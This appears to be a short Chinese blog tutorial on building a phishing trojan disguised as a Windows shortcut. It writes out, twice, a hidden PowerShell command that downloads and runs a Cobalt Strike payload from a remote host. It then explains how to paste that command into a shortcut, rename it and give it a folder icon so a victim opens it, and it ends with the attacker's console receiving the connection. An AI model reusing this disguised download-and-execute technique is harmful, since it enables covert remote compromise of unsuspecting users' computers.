制作快捷方式钓鱼木马
2023-3-28 16:18:12 Author: 白安全组(查看原文) 阅读量:141 收藏

用到的工具:

Cobalt Strike

这个基础用法

我们基于kali的系统,首先打开我们的cs,进行基础配置(监听器之类)

然后我们生成一个链接

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.119.135:80/a'))"

我们复制这个代码

第二步,我们到win10目标机器中,创建一个快捷方式

右击桌面选择快捷方式

找到windows中powershell的位置,正常的位置

C:\Windows\System32\WindowsPowerShell\v1.0

然后我们将power shell的位置和上面的木马链接拼接起来

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.119.135:80/a'))"

然后我们下一步,命名去掉exe,自己看着伪装

我们还需要更改下图标

右击选择属性

然后我们换一个文件夹的图标,地址在

%SystemRoot%\System32\shell32.dll

点一下确定就会出现这么多,我们根据自己的伪装需要来选择

我们双击打开,kali中的cs很快上线


文章来源: http://mp.weixin.qq.com/s?__biz=MzU4MjYxNTYwNA==&mid=2247486443&idx=1&sn=cde31eed5504d09ff4090a9010c31402&chksm=fdb4dcb0cac355a65fede923ecda94ea691dc2f0fb5b6c5341eab45918b5cc79616327ac4757#rd
如有侵权请联系:admin#unsafe.sh